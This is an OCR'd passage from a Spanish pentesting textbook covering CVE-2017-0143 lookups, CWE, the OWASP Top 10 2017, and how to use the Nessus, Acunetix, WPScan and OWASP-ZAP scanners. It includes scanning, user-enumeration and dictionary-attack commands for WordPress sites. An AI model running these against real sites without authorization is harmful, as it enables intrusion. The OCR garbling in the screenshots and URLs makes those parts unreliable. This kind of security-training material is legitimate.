There is 2 total shutdown of the effected resource. The attacker cen render the resource completely unavailable.) 





Access Complexity (The access conditions are somewhat specialized. Some preconditions must be satistified to exploit} 
Authentication Not required (Authentication is not required to exploit the vuinerability.) 

Gained Access None 

Vulnerability Type(s) Execute Code 

CWE 1D 29 


Otra cosa importante que notar en los detalles de un CVE, es la documentación 
y referencias, que te podrían dar indicaciones de cómo funciona el ataque, contra qué 
sistemas, y de donde puedes obtener la herramienta o código para ejecutar el ataque 
si es que este existe 
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— Products Affected By CYE-2017-0143 


# Product Type Vendor Product Version Update Edition Language 
1 Application Microsoft Server Message Block 1.0 Version Details Vulnerabilities 





— Number Of Affected Versions By Product 


Vendor > Product Vulnerable Versions 
Microsoft Server Message Block 1 


— References For CVE-2017-0143 

http://www. securitytracker.com/id/10937981 

SECTRACK 1037991 

https: //cert-portal.siemens.com/productcertipdf/ssa-701903.pdf CONFIRM 

https://portal. msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8143 CONFIRM 


https: //www.exploit-db.com, loits/41893, 
EXPLOIT-DB 41891 


https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf CONFIRM 
httos://www.exploit-db.com/expicits/43976/ 

EXPLOIT-DB 43970 

https: //ics-cert.us-cert.gov/advisories/ICSMA-18-058-02 


httos://www.exploit-db.com/exploits/4i987, 
EXPLOIT-DB 41987 


htto://www-securityfocus.com/bid/96703 
BID 96703 Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability Release Date:2017-05-18 








— Vuinerability Conditions 


Vulnerability is valid if product versions listed below are used TOGETHER WITHÍAND) 


Microsoft Windows 10 

Microsoft Windows 10 1511 
Microsoft Windows 10 1607 
Microsoft Windows 7 SPL 

Microsoft Windows 8.1 

Microsoft Windows Rt 8.1 

Microsoft Windows Server 2008 SP2 
Microsoft Windows Server 2008 R2 SP1 
« Microsoft Windows Server 2012 Gold 
Microsoft Windows Server 2012 R2 
Microsoft Windows Server 2016 
Microsoft Windows Vista SP2 


« Microsoft Server Message Block 1.0 

















Como podrás notar, en “references” hay varias ligas que hacen mención de 
código que puedes utilizar para realizar el ataque que explote esta vulnerabilidad, 
por ahorita solo debes saber dónde obtener ese código e información, en la sección 
de explotación hablare de como de hecho utilizarlo. 


Como última nota quiero aclarar, que el CVE se refiere a vulnerabilidades en 
sistemas o tecnologías, no tipos de ataque, que veremos luego. 
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Adicionalmente al CVE, existe algo llamado CWE, que son siglas de 
Common Weakness Enumeration. Los CWE hacen referencia a debilidades 
del software, pero no vulnerabilidades, seguramente te preguntaras, ¿cuál es la 
diferencia? Pues bastante, una vulnerabilidad, te permitirá directamente comprometer 
la seguridad en una de las tres áreas si logras explotarla. Por otra parte, una debilidad, 
de hecho, no necesariamente te permitirá comprometer la seguridad en ninguna 
forma importante, pero si este es el caso, entonces ¿por qué sigue siendo importante? 
Bueno lo que sucede, es que muchas veces una vulnerabilidad no es suficiente como 
para comprometer a un sistema, vamos a dar un ejemplo, digamos que logras subir 
un archivo ejecutable malicioso PHP en un servidor web, ahí está una vulnerabilidad 
que te permite subir ese archivo, sin embargo, sin acceder, nunca se va a ejecutarlo y 
por lo tanto no podrías obtener acceso al servidor, pero, por otra parte, si el servidor 
tiene la debilidad de que puedes ver los directorios completos del servidor, y logras 
por ese medio ejecutar el archivo malicioso, es así cómo obtendrás acceso. 


Para comparar, digamos que quieres entrar a una casa para robar, la 
vulnerabilidad es el equivalente a que hay una ventana sin llave en el segundo piso, 
mientras que la debilidad es que tengas todos tus objetos de valor a plena vista y sin 
esconder en tu habitación. 


Para buscar e interpretar las debilidades, basta con buscar su ID, que se 
estructura como CWE-ID, esto aparecerá en muchos analizadores de vulnerabilidades, 
así que es útil saber cómo buscarlo e interpretarlo. 


Para buscar un CWE, basta con meterse a https://cwe.mitre.org y buscar 
el ID, por ejemplo, si busco el ID CWE-538, me mostraría una descripción de que 
significa esta vulnerabilidad. 


CWE-538: File and Directory Information Exposure 


Weakness 1D: 538 
Abstraction: Base 








Presentation Filter: 


Eo y Soe 













The differe 


- rovide information about how and when this weakness may be introduced. The Phase identifies a point in the sofware 
typical phase. 


the given 


Imofementation OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. 
‘Operation OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. 


Y finalmente, las posibles consecuencias, en donde podria afectar dicha 
debilidad, y las posibles formas en la que se podria mitigar o corregir la debilidad. 
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seen relative tc the other consequences in the list. For example, there may be 
LikeBhood 


Phases: Architecture and Design; Operation; System Configuration 
Do not expose Rie and directory information to the user. 





Las debilidades no son tan criticas como una vulnerabilidad, sin embargo, 
combinarse con otros factores, podrían darle un camino aun atacante paracomprometer 
la seguridad de la información. En este caso, por ejemplo, que esencialmente 
permite a un atacante ver los directorios y archivos, podría afectar seriamente la 
seguridad empresarial si un atacante logra ejecutar por este medio algún archivo 
malicioso, o si el administrador sube por accidente algún archivo confidencial y el 
atacante lo descarga por la debilidad que encontró, incluso con el simple hecho de 
darle información al atacante. Esta debilidad estar poniendo en potencial peligro la 
información de la organización, las debilidades no deberían ignorarse. 


3.2 OWASP 


Open Web Application Security Project (OWASP) es la organización de 
código abierto sin fines de lucro más importante en temas de seguridad en páginas 
y aplicaciones web, tanto así que se ha convertido prácticamente en un estándar en 
cuanto a que fallas y vulnerabilidades hay que buscar primero y corregir en una 
página y (o aplicación) web con el famoso OWASP top 10. 


Ff) OWASP 


3.2.1 OWASP top 10 


Para leer documentación de OWASP, es completamente gratis, simplemente 
debes entrar a htíps://owasp.org y buscar el tema que deseas investigar, lo primero 
que debes conocer que ha hecho OWASP, que es fácilmente una de las cosas más 
importantes, es el OWASP top 10, que puedes encontrar en https://www.owasp. 
org/index.php/Top_10-2017_Top_10 , esta lista es de los 10 riesgos de seguridad en 
aplicaciones/páginas web más comunes y peligrosos publicada en el 2017, que es la 
lista más nueva al momento de escribir este libro hablaré un poco de ellos. 
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A1:2017 — Inyección 


Fallas de inyección a tecnologías como SQL, NoSQL, OS, LDAP, etc., 
esto ocurre cuando data no confiable se manda a un interpretador como parte de un 
comando o búsqueda, y la data del atacante engaña al interpretador para que este 
ejecute comandos no autorizados en el servidor o que le de acceso al atacante a la 
información de la víctima sin haber tenido la autorización adecuada. 


A2:2017 - Autenticación rota 


Funciones de una aplicación relacionadas con la autenticación y manejo de 
sesión de usuarios son comúnmente implementadas de forma incorrecta, permitiendo 
a los atacantes comprometer contraseñas, claves, tokens de sesiones, o utilizar alguna 
otra falla que le permita al atacante asumir o secuestrar la identidad de una víctima 
ya sea temporal o permanentemente. 


A3:2017 - información Sensible Expuesta 


Muchas aplicaciones web y APIs no protegen adecuadamente data sensible 
tal como información financiera o de salud, por esto, un atacante podría robar o 
modificar información que no haya sido adecuadamente protegida para realizar algún 
fraude bancario, robos de identidad, u otro tipo de ataques. La información sensible 
puede ser comprometida siempre y cuando no tenga protección adicional tal como 
encriptación en los dispositivos o en tránsito (tal como encriptación punta-punta). 


A4:2017 - Entidades XML Externas (XXE) 


Muchos procesadores viejos o mal configurados evalúan referencias de 
entidades externas dentro de documentos XML, y por lo tanto las entidades externas 
pueden ser utilizadas para encontrar archivos internos utilizando el manejador URI, 
así como archivos internos compartidos, puertos escaneados internamente, código 
ejecutable remoto, o ataques de negación de servicios. 


Ya sé que esta falla es un poco difícil de entender, así que lo pondré más 
fácil: a veces una aplicación web procesa data en el XML de forma incorrecta, y ese 
XML tiene alguna referencia a una entidad externa, un atacante podría modificar esa 
referencia de forma que lo apunta a un programa malicioso que podría comprometer 
la seguridad de la aplicación web. 
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A5:2017 - Control de acceso roto 


Las restricciones en lo que los usuarios autenticados en una aplicación/ 
pagina web pueden hacer no siempre está adecuadamente configurada, de forma que 
un atacante podría explotar las fallas en esta configuración para obtener acceso no 
autorizado a funcionalidad o información adicional como acceder a información de 
otros usuarios, ver archivos sensibles, o modificar accesos o data. 


Piensa en esto a una persona que entra a una compañía como “invitado”, y 
cómo no está siendo vigilado, se mete a alguna área con “acceso restringido”, lo cual 
puede hacer que tenga acceso a información sin autorización. 


A6:2017 - Mala configuración de seguridad 


Esta es la falla más común, sucede debido a fallas en la configuración 
por defecto, almacenaje abierto, cabeceras HTTP mal configuradas, errores de 
verbosidad dando información sensible. Para evitar esto todos los sistemas, librerías, 
frameworks y aplicaciones deben de ser adecuadamente configuradas en seguridad y 
además parchadas/actualizadas regularmente. 


Un ejemplo de esto podría ser digamos una página de WordPress en la que el 
administrador no actualizar sus plugins, y por lo tanto encontrarás una falla en uno 
de ellos. 


A7:2017 - Cross-site Scripting (XSS) 


Las fallas de XSS ocurren cuando una aplicación incluye información no 
confiable en una página web sin la adecuada validación, o acepta actualizaciones a la 
página web desde información proveniente de un usuario que permitan crear HTML 
o JavaScript dentro de la página web afectada. Esto puede permitir a un atacante 
ejecutar scripts maliciosos que pueden secuestrar la sesión de usuarios, “humillar” 
páginas web, o redireccionar a los usuarios a sitios maliciosos. 


Este es un ataque del lado del cliente, es decir, se busca atacar al usuario que 
utiliza la página web. 
A8:2017 - Deserialización insegura 


La deserialización insegura, comúnmente lleva a la ejecución remota de 
código, e incluso si esto no sucede, sigue siendo un peligro porque puede permitir a 
un atacante que realice inyecciones, escalar privilegios, entre otros. 
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A9:2017 - Usar componentes con vulnerabilidades conocidas 


Hoy en día es poco común que se cree una página/aplicación web u otra 
tecnología sin utilizar partes externas como librerías, frameworks, plugins, etc para 
ahorrar tiempo y esfuerzo, sin embargo, si este código tiene errores debido a que el 
desarrollador cometió un error, toda la aplicación podría ser comprometida, desde un 
atacante tomar control del servidor, hasta pérdida de información. 


Una analogía podría ser, digamos que estamos construyendo una cadena de 
muchas partes, si una de ellas es débil, toda la cadena se puede romper. 


Un ejemplo real es si tu creas una aplicación web, digamos, con MongoDB 
y se encuentra una vulnerabilidad en MongoDB, toda tu aplicación se puede ver 
comprometida, así mismo, si creas una página en WordPress y activas un plugin con 
alguna vulnerabilidad, toda la página web podría verse comprometida. 


A10:2017 - Falta de control de registros 


El monitorear insuficientemente los registros, combinado con falta de o mala 
implementación de un plan de respuesta de incidentes, permite a los atacantes seguir 
atacando más sistemas, obtener persistencia, pivotear a otros sistemas, extraer, 
modificar o eliminar información. La mayoría de los hackeos son detectados después 
de más de 200 días, y típicamente son detectados por auditorías externas, no internas, 
debido a esta falta de monitoreo. 


OWASP Top 10 - 2013 => OWASP Top 10 - 2017 
At — Injection > A1:2017 Injection 


A2 — Broken Authentication and Session on Management > :A2:2017-Broken Authentication 








A3 - Cross-Site te Scripting ss) | $ A3:2017-Sensitive Data Exposure 


M- Insecure Direct Object ef 


A5- Pa E 


AS — Sensitive Data maaan 7-Security Misconfiguration 
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3.3 ANALIZADORES DE VULNERABILIDADES 


Ahora veremos analizadores de vulnerabilidades, un analizador 
de vulnerabilidades es un software que realiza una serie de verificaciones 
automatizadas, tal como escaneo de puertos, servicios, y usando dicha información, 
busca automáticamente vulnerabilidades (CVEs y CWEs) en el sistema que está 
analizando. Esto es muy útil, ya que en ambientes organizacionales estos softwares 
permiten hacer auditorías a gran escala mucho más rápido, y como auditor nos 
facilita encontrar fallas superficiales rápida y fácilmente. 


Quiero dejar algo claro, un analizador de vulnerabilidades no es reemplazo 
para un experto y conocimiento/experiencia en ciberseguridad, y si se trata como 
tal, podría dar un falso sentido de seguridad, es solo una herramienta más, se deben 
probar los falsos positivos/negativos, y utilizar experiencia y conocimiento técnico 
para realizar una auditoría que valga la pena. 


Ahora mencionaré algunos de los analizadores de vulnerabilidades más 
comunes y útiles que utilizamos, no todos son iguales, algunos son específicos a una 
tecnología en particular, otros son más versátiles. 


3.3.1 Nessus 


Nessus es un software de análisis de vulnerabilidades creado por Teenable, 
es uno de los mejores y más utilizados sistemas de análisis de vulnerabilidades en el 
mercado, y en una auditoría un software como este puede ser muy útil. 


La particularidad de Nessus, es que tiene módulos para hacer análisis de 
vulnerabilidades prácticamente a cualquier sistema, tanto local como global, una de 
las cosas por las cuales es particularmente útil en la industria, sin embargo, como 
casi todas las herramientas en ciberseguridad, es una herramienta costosa, pero 
podemos utilizar casi todas sus funciones en la versión de prueba, que es renovable 
ilimitadamente. 


Para instalarlo, deberás ir a https://www.tenable.com/products/nessus/ 
nessus-professional/evaluate y solicitar una prueba, basta con tener un correo con un 
dominio comprado para que te manden una c/ave a tu correo electrónico, descarga el 
software en hitps://www.tenable.com/downloads/nessus (es compatible con Linux, 
Windows y OSX), y haz clic en el instalador. 


Luego de iniciar la instalación, haz clic en el botón verde y correr sin 
seguridad, luego que termine de cargar, crea un usuario y contraseña en la siguiente 
pantalla. 
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Para abrir Nessus, deberás tener el proceso abierto, y abrir una ventana de 
tu navegador en la página: https://localhost:8834 


Nessus (Y 


Create an atcount 


To use this scanner, an account must be created. 
This account can execute commands on remote 
targets and should be treated as a root user. 


Username * 


Continue 








Nessus Y | | 


Register your scanner 

Enter an activation code below to run your scanner 
locally or choose one of the dropdown options to 
run itin managed made. 


Scanner Type 


Home, Professional or Manager 


Activation Code * 
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Y finalmente se inicializará, esta es la parte más lenta de la instalación. 


Nessus 


fies needed 





Aqui es donde iniciaremos los escaneos, para iniciar uno, basta con hacer 
clic en el botón azul a la derecha, y seleccionar el tipo de escaneo que queremos 
realizar, estos son modelos de escaneos para diferentes tipos de sistemas, son muy 
útiles, pero están compuestos de módulos, y como tal, tu podrías crear uno propio en 
base a tus necesidades con la primera opción. 
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Vamos a decir que queremos escanear dos sistemas en una red interna y 
buscar si tienen vulnerabilidades, para esto, seleccionaremos un escaneo basico 
(basic network scan), que busca lo más común en todos los sistemas, junto con 
reconocimiento activo. Este escaneo, como puedes ver, te permite escanear a varias 
IPs al mismo tiempo, y te permite escanear tanto sistemas locales como globales, 
como el ejemplo de la página de nmap. 


New Scan / Basic Network Scan 
4 Back to Scan Templates 


Settings Credentials. Plugins > 


BASIC ~ Sean 
Escaneo 
# General Pat 
Schedule 
red intema 
Notifications 
DISCOVERY 
ASSESSMENT > My Scans 


REPORT 





i 192.168,1.141, 192.168.1.139, scanme.nmap org) 
ADVANCED 





Upload Targets 





Ahora hacemos clic en “save” (grabar), y en la pantalla principal nos 
aparecera este escaneo ya configurado, debemos hacer clic en la flecha para iniciar 
el escaneo. 
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Al hacer clic en el escaneo, podemos ver el avance, junto con la información 
que va obteniendo de cada activo escaneado. Como puedes ver, tiene un rango de 
qué tan crítica es una vulnerabilidad que te debería de recordar al CVSS. 





Para ver detalles, hacemos clic en el activo que queremos ver, y nos mostrará 
detalles de la información obtenida. En este ejemplo, nos dice en la parte derecha 
que es un Windows 7 Home, su IP, dirección MAC, y nos dice que tiene dos 
vulnerabilidades críticas y algunas otras de menos gravedad, las vulnerabilidades 
críticas son las que más nos interesan 


MEM 112 teres nos retos Toad Aks Perote Coce tanner ORISA erete he 
EE sc eami toia: eet Nes ME ere BY PRE TERROR 
BE crew etre tcos 
NE Sasa smactericasd Aces Soweto: 
A SEI Bade iancvene sad MÓ 

Ea 
E ecim 
EN «== 


a. ER 





Ya que nos interesan las vulnerabilidades críticas, haremos clic en una de estas 
para ver que nos muestra. Como podemos ver, en la pantalla principal nos muestra 
una descripción de la falla, posibles soluciones, y algunas ligas con documentación. 
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MENE ms17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPI} 


Description 
The remote Windows host is affected by the following vulnerabilities : 


- Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 ¿SM2w1) due to improper handling of certain requests. An 
unauthenticated, remote attacker cen exploit these vulnerabilities, vía a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, 
CVE-2017-0145, CVE-2017-G146, CVE-2017-0 248} 


- An information disclosure vuinerabifity exists in Microsoft Server Message Block 1.0 {SMBv1} due to improper handling of certain requests, An 
unauthenticated, remote attacker can expinit this, via a specially crafted packet, to disclose sensitive information. (CWE-2017-9147) 


ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of muftiple Equation Group vulneradibties and exploits disclosed 
on 2017/04/14 by a group known as the Shadow Brokers. WaanaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit and 
SternafRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in 
Microsoft Office. end then spreads via ETERNALBLUS. 


Solution 
Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012. 8.1, RT 8.3, 2012 R2, 10, and 2015, Microsoft has also released emergency 
patches for Windows operating systems that are no longer supported. including Windows XP, 2003, and 8, 


For unsupported Windows operating systems e.g. Windows XP, Microsoft recommends that users discontinue the use of SMEv1. SMBv1 lacks security 
features that were included in later SMB versions. SMBv? can be disabled by following the vendor instructions provided in Microsoft KB2536547, 
Additionslty, US-CERT recommends that users black SMB directly by Blocking TCP port 445 on ail network boundary devices. For SMB ower the NetBiOS AR, 
block TCP ports 137 f 139 and UDP ports 137 / 138 on aif network boundary devices. 





Sin embargo, como pentester, me interesan un poco más las referencias que 
se muestra en la parte a la derecha, ya que me muestra en que afecta a la seguridad 
en base al CVSS, si existe un exploit que pueda atacar a esa vulnerabilidad, que 
herramientas tienen ese exploit, y el CVE, que si hago clic en este último, me llevaría 
a una página donde podria encontrar todavia más documentación de cómo funciona 
y cómo se explota esta vulnerabilidad. 


Risk Information ni 


Critical 

37833 Risk factor: Critical 

18 CVSS Base Score: 10.0 

remote CVSS Tampoi Score: SF 

Windows CVSS Vector: CVSS2RAVNY/ACL/AUNUICLACIAL 
March 20.2017 cues Temporal Vector: CVSS2#EH/RLOFRCL 


Juty 16, 2018 n 
siy AVM Severity: t Reference Information 


Metaspiox (4517-010 fterai®lue SMB Remote 
Windows Kernel Pool Corruption} 


CANVAS 9 
Core impact 


EDS-iD: 41891, 41987 
] 3 MSET: MS17-019 
Vulnerability Information BID: 96703. 96704, 96705, 96705, 96707. 96709 
i IAVA: 2017-A-0065 
CPE epeJamicrosoiewindows MSKE: 4012212 4012213, 4012214, 4012215, 
Exploit Avañable: true 4012216, 4012217. 4052606, 4013198, 4013429, 
Mee aol Se 4012598, 4012212. 4012213, 4012214, 4012218, 
UI AAA 2012216. 4012217, 4012606, 2013193. 4013429, 
Pateh Sub Date: March 14, 2017 4012598 
Vulnerability Pub Date: March 14. 2017 CVE: CVE-2047-0143, CWE-2017-0144, CVE-2017- 
DIAS. CVE-2097-0146, CVE-2017-0147, CVE-2017- 
0143 


in the news: true 
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Adicionalmente, en la fase de informe, especialmente en la ejecutiva, es de 
gran ayuda la función de exportación de esta herramienta. Para utilizarla, basta con 
usar el botón que está a la derecha “export” dentro de un escaneo, y posteriormente 
elegir en qué formato quieres que se exporte, a mi particularmente me ha sido muy 
útil el formato HTML ya que es fácil de mover y leer, sin embargo, dependerá de ti 
que formato te sirve mejor. 


Configure Audit Trail 





En el reporte, te mostrará de forma más fácil de exportar y mandar, un 
documento en el cual te dará los detalles de las vulnerabilidades de cada activo que 
hayas auditado, esto te será muy útil para preparar los entregables al cliente final. 


Hosts Drecutive Summa 


192.168.1.130 


noted Stare riormatan Denlesore 


Leton Operssipnperss Sackege Random Number Generales Weakness 





3.3.2 Acunetix 


Acunetix es un escáner de vulnerabilidades de aplicaciones web. La 
herramienta está diseñada para encontrar agujeros de seguridad en las aplicaciones 
web de la organización que un atacante podría aprovechar para obtener acceso a 
los sistemas y datos y nos ayuda a documentar los reportes en diferentes estándares 
como ISO 27001. 
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Iremos a descargarlo la versión de 14 días en la siguiente ruta: https://www. 
acunetix.com/vulnerability-scanner/download/ 


© & Sears | https wee acuneixcom 


. 
> 
=: 
. 
> 
e > 
= 
a 


The triol downlood ink will be sent 10 you vio email, 40 entere you enter O valid mor oddress. 


Enter first Name 


Enter Last Name 


Emer Company Name 


Enter Phone Number 


Enter Eiei Address 


C rm a Software Reseller 





Llenamos los campos para poder descargarlo e instalarlo. 


Una vez instalado lo ejecutamos y se nos abrirá en nuestro localhost un 
servidor de Acunetix en el puerto 13444, o sea, en https: //localhost: 13444 


Para realizar un nuevo escaneo agregaremos un Target para así después 
darle clic donde dice New Scan y ahí poner la URL de la página web que queremos 
escanear. 


acunetix 





© RA-MA Capítulo 3. ANÁLISIS DE VULNERABILIDADES 123 


Add Target 





El escaneo se empezará a realizar y una vez concluido nos mostrará las 
posibles vulnerabilidades que tiene el servidor web escaneado. 


Los escaneos suelen tardar algo de tiempo y consume mucho ancho de banda. 








Una vez finalizado el escaneo nos arroja las posibles vulnerabilidades las 
cual hay que validar a mano, para así pasar a la fase de explotación en un Pentesting. 
Acutinex, a diferencia de Nessus, se especializa en aplicaciones y páginas web, 
entonces tiene algunas ventajas en estas áreas, en este caso, reporta desde para 
cumplir ciertos ISOs, hasta de acuerdo con OWASP top 10, puedes hacer clic en la 
pestaña de vulnerabilidades para ver las vulnerabilidades. 
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Stan State & info vulnerabilities Site Structure 


Vulnerability ¿URL 


] 


Cross site scripting Ittpe//192.188.1.68/ 
WordPress ‘get_edit_past_ink{y' and get-edit co.. hitp://192.168 Lat 
‘WordPress ‘press-this.php’ MultipieCross-Ste Seri... httpo//192.188.1.68/ 
WordPress ‘press-this php’ Remote Security Bypas... hitp://152.186.1.65/ 
WordPress templates. php Cross-Site Scripting Yul. http://192.168.1.68/ 
WordPress ‘wp-adminjadmin.ohp’ Module Configu... http//192.198.1.68/ 
WordPress “wp-adrenfoptinns php’ Remote Code...  httpe//192.168.1.68/ 
WordPress ‘wp-db.php’ Character Set SCL injectio.... ntep://192.1628.1.68/ 
WordPress “wp-registor.php' Multiple Cross-Site'Sc.., _hitp://19Z.268:1.68/ 
WordPress 2.0.1 Danial of Service Vulnerability 10.8... http://192,188.1.58/ 
WordPress 2.0.2 Username Remote PHP Carle injec... hitp://192.168.1.68/ 
WordPress 2.0.3 Multiple Unspecified security Yule... hetec//192.160.1.68/ 
WordPress 10,5 Charset Decoding SOL injection Yu.. hitp://182.166-1.65/ 
WordPress 2.0.5 Cross:Site Scripting Vulnerability |.  http//192.168-1.68/ 
WordPress 2.0.5 invalid CORF Toker Cross-Site Soie httpc//192.192.1.68/ 
WordPress 2.0.6 ‘Zend Hash Del Key Or indo S.. hatp:/(192.168.L58/ 
WordPress 2.0.9 Multiple Vulnerabilities (2.0-2.0.9)  ttp//192.196.1.68/ 
‘WordPress 2.3.2 Post Edit Unauthorized Access Vol... hitp://197.168.1.68/ 
WordPress 2.3.9 Directory Traversal Vulnerability (0... hitp:y//192.188.1.68/ 


WordPress 2.5 Cookie Integrity Protection Unautho... hrtpr//i92.166.1.65/ 


WordPress 2.4.1 Lost Password SQE CUMA Tene...  httpr//192.168.1.687 





Y al hacer clic en una de ellas, te mostraria lo que cualquier analizador 
de vulnerabilidades: descripción, detalles del ataque, impactó, recomendaciones, 
documentación, etc. en donde puedes tomar el CVE o CWE o el número del OWASP 
top 10, dependiendo de la vulnerabilidad, para buscar como explotarla. 


Cross site scripting 





The impact of this vulnerability 
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Así como Nessus, también tiene un apartado donde puedes generar reportes 
en el botón “Generate Report”, y puedes hacerlo en base a tus necesidades, tal como 
un reporte ejecutivo, o OWASP, o algún ISO en particular. 


Generate Report 


Template 





Choose... 





Standard Reports 
Affected items 
Developer 
Executive Summary 
Quick 





En el reporte aparecerán las fallas que encontró la herramienta. 





3.3.3 Otros analizadores de vulnerabilidades 


Webhackshl es otra herramienta de análisis de vulnerabilidades para 
aplicaciones web, su funcionamiento es muy sencillo, a diferencia de Acutinex o 
Nessus, en si funciona al llamar a varios analizadores de vulnerabilidades de código 
abierto, tal como Nikto, WPScan, Joomscan y, además, tiene implementaciones de 
TOR para mantener un nivel de anónimo si es que es requerido. 


Para utilizar la herramienta, basta con abrirla de la carpeta /opt/AV/ 
WebHackSHL 
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Y posteriormente ejecutar el comando con los comandos chmod +x 
webhackshl.py y ./webhackshl.py 


ckSHL# ./webhackshi.py 





Al ejecutar el script, te aparecerá un menú, en el podrás elegir qué es lo 
que quieres hacer, tiene muchas aplicaciones muy útiles, como encontrar fallas 
en XSS y SQLi, algo que sería muy útil, o encontrar el panel de control, o evadir 
seguridad en páginas web. La opción d es la que te servirá para realizar análisis de 
vulnerabilidades en una página web. 





Luego de seleccionar la opción d, tendrás algunas opciones más para 
realizar análisis de vulnerabilidades. La opción a te daría información similar a la 
que esperaríamos encontrar en la etapa de reconocimiento, así que nos enfocaremos 
en las otras, en las que hay tres opciones, si estás analizando una página web hecha 
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sin algún CMS, elige la opción b, ya que NIKTO te ayudará a realizar un análisis 
de vulnerabilidades de esta, sin embargo, si la página web está desarrollada con el 
CMS WordPress, utiliza la opción e, y si el CMS es Joomla, utiliza la opción c, las 
variaciones de estas en las opciones d y f simplemente agregan TOR, una tecnología 
que te mantendrá anónimo mientras realizas los analizadores, solo usa esas opciones 
si estás buscando evadir un sistema de seguridad o si el trabajo exige ser anónimo. 


Para este punto deberías saber que opción te conviene usar si hiciste un buen 
reconocimiento, de forma que sabrás con qué tecnología fue construida una página 
web. 


elecciona: d 
Seleccina una de las si 


a) 
b) Buscar vulnerabilidades web usando nikto. 


c) Buscar vulnerabilidades web de sitios web Joomla. 
d) Buscar vulnerabili web de sitios web Joomla usando FOR. 
e) Buscar vuinerabilidades web de sitios web con WordPress 
f) Buscar vulnerabilidades web de sitios web con W6rdPress usando TOR. 
g) Salir. 
Introduce tu opcion: 





En este ejemplo, elegí Nikto para realizar un escaneo contra una página, 
puedes esperar una respuesta similar a esta en la terminal, en la que tienes que buscar 
las vulnerabilidades en los renglones, como te das cuenta, esta herramienta no es tan 
“bonita” como las de paga, sin embargo, también es bastante efectiva. 





3.3.4 Análisis a páginas WordPress 


Otra de las opciones que aparecen en webhackshl, sin embargo, que vale la 
pena aprender a utilizar por sí misma, es WPScan, esta es una herramienta escrita en 
Ruby diseñada específicamente para realizar análisis de vulnerabilidades a páginas 
hechas con WordPress. 
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Para utilizarla, basta con escribir wpscan en la terminal. 


:/# wpscan 


Similar a nmap, debemos de ponerle parametros para que nos dé alguna 
respuesta util, digamos que queremos hacer un escaneo general a una pagina, 
utilizamos el parámetro -u, de forma que el comando completo sea wpscan -u 
<pagina web> 


:/# woscan -u http://192.168.1.68/wordpress 





Después de esto, nos mostrara los resultados en la terminal, tales como 
informacion del servidor y del sistema. 





Versión y vulnerabilidades en la versión de WordPress instalada, y si ha 
habido actualizaciones que resuelvan dichos problemas. 


ii Includes directory has directory listing ena 


ng WordPress vers 
dPress ‘http://192. 


version 2.0 (Release 
abilities identified fr 


https: //cve.mit 
Fixed in: 2.0.2 





Temas, y si estos temas están desactualizados y existe alguna vulnerabilidad 
en estos. 


WordPress t in use: default - v 


rybonsai / 
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Y finalmente, plugins encontrados, y si existe alguna vulnerabilidad en estos. 





Como podras notar, al igual que otros analizadores de vulnerabilidades, nos 
da referencias y ligas donde podemos investigar cómo funcionan y cómo explotarlas. 


Adicionalmente, WPScan tiene algunas otras funciones, tales como encontrar 
usuarios, hacer ataques de fuerza bruta, directorios, y utilizar proxys, puedes ver 
estos comandos extras con el comando wpscan -h 


Aquí te pongo algunos de los más comunes/útiles. 


_ wpscan -u <página.com> --enumerate p Este comando 
wpscan -u <página.com> --enumeratet Este comando te da una lista de los temas instalados 






wpscan -u <página.com> --enumerate u Este comando 


oe 
wpscan -u <pagina.com> --wordlist Este comando te permite realizar ataques de diccionario 
<lista> --username <usuario> a la pagina. 


3.3.5 Analisis OWASP a paginas web 


OWASP-ZAP es la herramienta de análisis de vulnerabilidades creada por 
OWASP, que hace escaneos en base a sus estándares de seguridad en aplicaciones/ 
páginas web. 


Esta herramienta es multiplataforma y puedes descargarla en casi cualquier 
sistema entrando a htips://www.owasp.org/index.php/OWASP_Zed Attack Proxy 
Project , sin embargo, en el sistema que estamos utilizando (Kali), ya está instalada 
por default, así que basta con escribir el comando owasp-zap en la terminal. 


:/# owasp-zap 
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Afortunadamente para quien no sea tan amante de la terminal, esta es una 
herramienta con interfaz grafica, asi que es sencillo de entender. Una vez abierta, 
basta con introducir la dirección web de la página que queremos analizar en la barra 
de búsqueda, y presionar el botón “Attack”. 


ER 
[i Geek at A + Request 











Esta acción hará que el programa corra un escaneo estándar de la aplicación/ 
página web que estés analizando, en la parte inferior notarás algunas pestañas, 
estas están haciendo varios trabajos importantes, el primero, es el spider, que está 
indexando todas las páginas en el sitio y los métodos que acepta. 





hupy/192.168.1.58/wordpresvwp-<omments-post.php 
http://192.168.1.68/wordprecs/?feed arss2ipe1 
Attp-7192.168.2.68/wordpress/wp-trackback pho?p=i 








Al terminar el análisis, irás a la pestaña de alertas, en donde encontraras 
vulnerabilidades del sitio/aplicación web analizados y detalles de cada una, así como 
su gravedad (como has visto en otros analizadores de vulnerabilidades) y en base a 
eso empezar a planear un ataque contra el objetivo. 








ES Alerts (7) 


» $e Buffer Overflow 


» $ Directory Browsing 

» $e X-Frame-Options Header Not Set (17) 

> 72 Private IP Disclosure (4) 

> £2 Web Browser XSS Protection Not Enabled (19) 
|» & X-Content-Fype-Options Header Missing (27) 





Adicionalmente, puedes agregar mas pestafias para hacer otros tipos de 
análisis, por ejemplo, fuzzers que te permitirán encontrar URLs donde hacer 
inyecciones, entre otras cosas. 
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Ta AJAX Spider E 
XK Break Points 
<> Clients 
¿> Forced Browse 


@ Fuzzer 

= HTTP Sessions 
E Params 

af WebSockets 
& Zest Results 





Al terminar el análisis, querrás exportar tus resultados en el formato que 
más te sirva. De nuevo te repito es de acuerdo con tus necesidades, yo en general el 
HTML se me hace un formato que va de acuerdo con lo que necesito. 


File Edit View Analyse [K3Uas Tools Online Help 
| Generate HTML Report... 
Generate XML Report... 
Generate Markdown Report... 
Generate JSON Report... 
Export Messages to File... 
Export Response to File.. 
